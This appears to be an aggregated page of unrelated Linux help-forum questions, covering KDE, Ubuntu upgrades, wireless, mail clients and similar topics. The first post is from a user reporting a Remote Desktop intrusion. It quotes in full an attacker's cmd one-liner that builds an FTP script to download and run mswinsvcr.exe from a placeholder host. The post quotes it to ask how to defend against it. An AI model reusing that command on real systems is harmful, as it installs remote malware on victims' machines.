I was editing a file in emacs on an ssh connection to a school server when all of a sudden I see the remote desktop graphic (a thing that looks like a widescreen monitor) pop up in the top panel. A second later it announces that someone else has connected to my computer with 'ffff:someip'. I'm not sure of the specifics because I was too shocked. I do remember it started with some number of f's before a : The hacker then started typing
Code:
%systemroot%system32cmd.exe
del eq&e
I promptly yanked out the ethernet cable before anything else could be typed. I then went in and changed the Remote Desktop preferences to not allow anyone in. I'm guessing that I cut the hacker off from fully entering in a command similar to this:
Code:
%systemroot%system32cmd.exe
del eq&echo open 0.0.0.0 13643 >> eq&echo user 13302 30046 >> eq &echo get
mswinsvcr.exe >> eq &echo quit >> eq &ftp -n -s:eq &mswinsvcr.exe &del eq
which I found here: [URL]
How concerned should I be? It appears to be a windows hack. Did I prevent any damage from occurring? Is Remote Desktop really that easy to connect to another persons computer? I know this question is bait in a way. On my home machines I only allow vnc via ssh tunnels and that is through a router with proper port forwarding for the ssh ports and very few other ports forwarded. Such an attack has never happened to me at home. Is this possibly due to my setup or was I just lucky no one picked my computer to hack? So is the ssh tunnel & port forwarding a sufficiently safe setup or am I still at risk?
What degree of protection does the ssh tunnel and port forwarding provide? What else should I do to make my current home setup even more secure? The text I wrote above was the only text typed into the terminal. Because the attack was over Remote Desktop, what is the possibility that it was a bot? The text appeared slow enough for me to think that there was a person rather than a machine/program typing in the text. Does the Remote Desktop connection in a way provide a level of abstraction that prevents scripts as commands must be typed in through the Remote Desktop connection (vs. a ssh connection where a script might more easily be uploaded and executed)?
In the end I'm curious as to what else might have been accessed over the connection or if it was probably just restricted to the hacker attempting to run some windows commands? Since they connected via Remote Desktop and I saw the connection pop up and the typing begin in my terminal, did I see everything that the hacker attempted to perform? Am I correct in my research in finding that there is no log for Remote Desktop connections and therefore I can't find the ip they were connecting from? However, I would like to use this as a wake up call to myself to prevent unwanted access on my home computers.
I am looking for a simple app that cut and past some thing that is been displayed on my desktop.
For example, I am writing a document and need to put a image there, but this image is in another document!
I do not know if I have made myself clear! If you guys did not understand I van try explain better!
I've been using Kubuntu for about 6 months now and decided to try something new. So i switched to arch linux, and after much deliberation, I got KDE functional on it. There's just one problem. The icons aren't displaying properly. Here's a picture:

How do I change the turquoise-ish plasma-desktop and title bar things. Also whenever i open something, it asks me basically where i want to position it. How do i stop it from asking me that as well?
Also, how do I login as something other than root? I did adduser, but no login screen shows up for me.
I'm working through some problems in a beginners programming book. The author mentions a formula for calculating the number of ways of picking out n things from a collection of m of them:
Code:
/ m m!
| | = -----------
n / n! (m-n)!
But he does not give a name for the formula. Does anyone happen to know what it is called? I need to do some related research.
When i log into to a non root(user) mode, i am always greeted by a small terminal window before the desktop starts up. Also, after desktop starts a new window opens which displays the contents of my windows desktop.
I am unable to stop this from happening. I am running Ubuntu 10.10(32 bit) along with Windows 7(64 bit) on different partitions.
I've been using mail-notification from the repos for ages to monitor my gmail account with no problems. Since I upgraded to Karmic, it's been popping up an irritating dialog window whenever a new mail arrives (as well as the standard notification). how to turn it off without losing all notifications?

When I log in using pam_usb, my session dies abruptly if I unplug the usb drive.I am _not_ runing pamusb-agent.It seems like there may be some issue with policykit, but I'm not sure./var/log/auth.log:

Lucid was working okay for a few weeks. I believe this issue came up anew in the past few days after a recent system update. The (desktop) system when idle for x amount of time (likely > 1 hour) just shuts down while I am off doing something else. That is bad when downloading a large file that has to be started from scratch again (826 Mb of an 875 Mb file).
I have had to revert back to Hardy (kept in a separate partition) in order to get these wanted downloads. But I do a lot of downloading of film files, so this will be an ongoing issue until I can somehow correct it. I went through the screen-saver options/power management settings, found nothing unusual there, though I am not real certain of all the terminology there.
Evolution is presenting many incoming email messages as double-spaced when they weren't written that way. The unwanted double-spacing is also retained in replies, which show the original messages as having repeated carriage returns. How can this be prevented so that Evolution renders the messages as they were written?
View 1 Replies View RelatedI'm new to Ubuntu so bear with me. I installed 9.10 from a CD and it looks fine and works OK wired. However, my wireless keeps picking up a connection at home via my Linksys router that is not mine and I can't get around it, blacklist it or delete it. No matter what I do it keeps showing back up as an AutoConnection. It is the same type of router as mine but the security is different (I use WPA-Personal and the offender is WEP). How can I permanently blockdisableetc the extra connection? I can't get on my home network until the bad autoconnection is gone. More info: I use an IBM R40 into which I installed a Toshiba mini-PC wireless card. I know it works as I have used it to connect to other wireless networks other than my own. I prefer to leave my router configured as it is due to other users at home and the configs I use for them. I read about WICD if that is a possibility, but actually connecting wirelessly is not the issue.
View 4 Replies View RelatedI have an icon for what seems to be universal access preferences modifying that is residing near my notification area on top GNOME panel. I have been trying to figure out how to get rid of it, but can't seem to. I took the program off of autostart apps, and have checked running processes to see if I could find which program has it going but I have exhausted my limited knowledge base in solving this.

However, the current version of my Firefox is 3.6.3 which has been upgraded via the software's automatic self-update.I'd like to silence the Ubuntu Software Center for the Firefox upgrade.

View 9 Replies View RelatedBecause of a hard disk failure I had to buy a new disk and reinstall Ubuntu 10.04. Prior to the install I was running the live cd version of 10.04. When I connected to my wireless network and entered the password the key manager wanted me to enter a password to protect the network password. Now every time I boot up the system the network will not automatically connect. (It used to do this). Now I have to click on the network manager and select my network. When I do this I get the key manager asking for a password.
So how do I stop the key manager nonsense and get the network to connect automatically as it once did.
still facing some challenges getting full control of my computer. One problem I can't figure out alone it seems, is that when I open a "place" via Places, Ubuntu immediately launches the first media file it finds in that place, instead of opening the folder. If there are no media files, it often just launches... nothing. The media player pops up empty, and the folder still does not get opened. I can't get into my folders via Places because of this.

I noticed after uninstalling Firefox that the folder is still listed in the files/etc ... how do I delete these files?
/etc/firefox

How do I uninstall unwanted applications? Is there a log of all installed applications? When I ran setup and chose my packages, for KDE, and I am sure others the options came in bundles, ie KDEbase-version... Is there a way to see all package contents to remove individual programs?
View 5 Replies View RelatedI just upgraded to 10.04, all went well, except now the "s" and "m" keys on my keyboard open the login menu and the "Me" menu (with the mail and chat options) respectively. Obviously this is very irritating, I can only type those letters by holding down alt. I can't think of how this happened, it didn't do it before the upgrade. I'm using an Apple aluminum keyboard with a Dell. When I run xev and type the s or m key, I get this:
[Code]....
There are no relevant shortcuts under keyboard shortcuts. I am using a xmodmap file that looks like this:
clear mod1
clear mod4
keycode 133 = Alt_L
keycode 134 = Alt_R
keycode 64 = Meta_L
keycode 108 = Meta_R

I have just upgraded my old work horse from 9.10 to 10.04 and on the surface everything looks ok. However there are a few annoying issues that I have not been able to resolved. One of these is an annoying auto shortcut that links the 'm' key to the Indicator applet while running my desktop inside an XRDP session (Windows Vista client). Everytime the m key is pressed, the focus is autotragically hijacked by the Indicator applet. Attempting to type any text from any application such as the terminal or text editor is excruciating since everytime the m key is pressed the focus jumped to the Indicator applet, the only way to disable this 'feature' is by removing the Indicator applet.
This problem is not seen in the native console, only in XRDP sessions.
There is another thread that deals with similar issue [URL] but only for users with Apple keyboards and does not apply to my situation.
I use XRDP alot so this affects me severely. How do I go about diagnosing this problem, xev doesn't even see any event when the m key is pressed, the focus just jumped to the Indicator applet?
In order to keep my system clean, normally if Update Manager wants to update a package I don't want or never use, I use this as a trigger to first go to Synaptic Package Manager and de-install the unwanted package, then refresh Update Manager and continue with the wanted updates.
However when it wants to install something completely new that clearly I don't want or need, how do I tell Update Manager to permanently remove it from the update list?
my computer is often very slow, to the point of stalling. I tty'd in and when I ran ps -ef I noticed about 10 /usr/sbin/apache2 -k start I dont even want 1 apache running. Any suggestions why these are running, or how to stop it? Well, I can stop it with a sudo killall, but how can I make sure it doesnt happen again?

1. some time for a few minutes (maximum 10 minutes) my server block some of my clients to access it or internet but just for minutes but it is very annoying.
2. all of my clients those who login to an https servers or login to their mail or those who has some software like team viewer say that they are logging out from their session randomly I mean some of them logging out from their mail(yahoomail or googlemail ) or disconnecting from teamviewer connection or as I saw team viewer disconnecting for a few seconds and then comes back again. but I did not set any thing in my firewall or other services. this is my complete iptable rules:

I've just installed Squeeze with KDE. I was wondering what is the best way to remove some unwanted apps without breaking everything (I want to get rid of Kopete and a few other apps like Dragon Player as I don't use them)?
I tried to: apt-get remove kopete
but it said it wanted to remove a whole bunch of other stuff as well. (I'm a recent Fedora convert).
I am using Fedora12 with latest update, and am using kde4.3.4.
To decrease the memory consumption on one of my system I disabled many services presently only following services are running:
NetworkManager
abrtd
acpid
akmods

Now I want to stop some default running process like modem-manager, seapplet, ksmserver, krunner and sometime knotify4. I could not locate the initiation point of these services. So that I can manage (start/stop) these services.
